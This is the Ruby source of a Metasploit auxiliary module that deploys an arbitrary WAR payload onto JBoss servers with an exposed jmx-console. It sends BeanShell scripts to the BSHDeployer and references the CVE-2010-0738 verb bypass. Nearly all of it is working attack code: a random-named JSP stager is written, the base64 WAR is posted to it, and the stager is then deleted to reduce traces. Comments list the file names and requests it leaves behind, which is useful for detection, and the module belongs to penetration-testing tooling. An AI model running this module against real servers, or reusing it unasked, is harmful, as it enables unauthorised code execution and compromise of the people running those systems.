Path: blob/master/modules/auxiliary/admin/http/jboss_bshdeployer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit auxiliary module that places a WAR file on a JBoss server, or
# removes it again, by sending BeanShell scripts to the BSHDeployer through an
# exposed "jmx-console" application.
#
# The helpers called below (http_verb, generate_bsh, deploy_bsh, deploy_package,
# deploy, stager_jsp) are not defined in this file; they are presumably supplied
# by the included JBoss mixin, so their exact behaviour should be confirmed there.
#
# File names and requests that this file asks for, useful when reviewing web
# server logs or the deploy directory of an affected host:
# * Deploy, http_verb == 'POST': a create script for "<APPBASE>.war".
# * Deploy, any other verb: a create script for a directory
#   "<8-15 random letters>.war" holding a same-named ".jsp", then a POST to
#   "/<name>/<name>.jsp" whose single parameter has a random 8-15 letter name.
#   A delete script for the stager follows; if that step fails the stager
#   stays on the server.
# * Undeploy: a delete script for "<APPBASE>.war" only.
#
# NOTE(review): per the description the precondition is a reachable jmx-console;
# the CVE-2010-0738 reference is annotated "using a VERB other than GET/POST",
# so access control on the console should cover every HTTP verb — confirm
# against the linked advisories.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::JBoss

  # Declares the module metadata, its two actions (Deploy is the default) and
  # the options RPORT (default 8080), APPBASE (required, default 'payload') and
  # WARFILE (optional path).
  def initialize
    super(
      'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',
      'Description' => %q{
        This module can be used to install a WAR file payload on JBoss servers that have
        an exposed "jmx-console" application. The payload is put on the server by
        using the jboss.system:BSHDeployer's createScriptDeployment() method.
      },
      'Author' => [
        'us3r777 <us3r777[at]n0b0.so>'
      ],
      'References' => [
        [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
        [ 'OSVDB', '64171' ],
        [ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],
        [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]
      ],
      'Actions' => [
        ['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],
        ['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]
      ],
      'DefaultAction' => 'Deploy',
      'License' => BSD_LICENSE,
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('APPBASE', [ true, 'Application base name', 'payload']),
        OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])
      ]
    )
  end

  # Sends the WAR to the server, directly when http_verb is 'POST' and through
  # a temporary JSP stager otherwise.
  #
  # @param app_base [String] base name used for the "<app_base>.war" file
  # @param war_data [String] raw bytes of the WAR file
  # @return [Object, nil] nil when the first deployment fails or on the POST
  #   path; otherwise the result of the last status print
  def deploy_action(app_base, war_data)
    # The WAR travels as a single-line base64 string.
    encoded_payload = Rex::Text.encode_base64(war_data).delete("\n")

    if http_verb == 'POST'
      print_status('Deploying payload...')
      opts = { file: "#{app_base}.war", contents: encoded_payload }
    else
      print_status('Deploying stager...')
      stager_name = Rex::Text.rand_text_alpha(rand(8..15))
      stager_contents = stager_jsp(app_base)
      opts = {
        dir: "#{stager_name}.war",
        file: "#{stager_name}.war/#{stager_name}.jsp",
        contents: Rex::Text.encode_base64(stager_contents).delete("\n")
      }
    end

    package = deploy_bsh(generate_bsh(:create, opts))
    if package.nil?
      print_error('Deployment failed')
      return
    end
    print_good('Deployment successful')

    # On the POST path the WAR itself was just written; nothing is left to do.
    return if http_verb == 'POST'

    # The stager receives the base64 WAR in one POST parameter with a random name.
    stager_uri = "/#{stager_name}/#{stager_name}.jsp"
    param_name = Rex::Text.rand_text_alpha(rand(8..15))
    payload_data = "#{param_name}=#{Rex::Text.uri_encode(encoded_payload)}"
    print_status("Calling stager #{stager_uri} to deploy final payload...")
    res = deploy('method' => 'POST', 'data' => payload_data, 'uri' => stager_uri)
    if res&.code == 200
      print_good('Payload deployed')
    else
      print_error('Failed to deploy final payload')
    end

    # Stager removal is attempted whether or not the final deployment worked.
    print_status('Removing stager...')
    files = {
      stager_jsp_name: "#{stager_name}.war/#{stager_name}.jsp",
      stager_base: "#{stager_name}.war"
    }
    removal = deploy_package(generate_bsh(:delete, files), package)
    if removal.nil?
      print_error('Unable to remove Stager')
    else
      print_good('Stager successfully removed')
    end
  end

  # Requests deletion of "<app_base>.war" through the BSHDeployer. Only that
  # one entry is passed to the delete script here; no stager name is included.
  #
  # @param app_base [String] base name of the WAR to remove
  def undeploy_action(app_base)
    print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")

    delete_script = generate_bsh(:delete, { app_base: "#{app_base}.war" })
    if deploy_bsh(delete_script).nil?
      print_error('Unable to remove WAR')
    else
      print_good('Successfully removed')
    end
  end

  # Entry point: dispatches on the selected action. Deploy stops with an error
  # when WARFILE is unset or does not exist; the file is read in binary mode.
  def run
    app_base = datastore['APPBASE']

    case action.name
    when 'Deploy'
      war_path = datastore['WARFILE']
      unless war_path && File.exist?(war_path)
        print_error('WAR file not found')
        return
      end
      deploy_action(app_base, File.read(war_path, mode: 'rb'))
    when 'Undeploy'
      undeploy_action(app_base)
    end
  end
end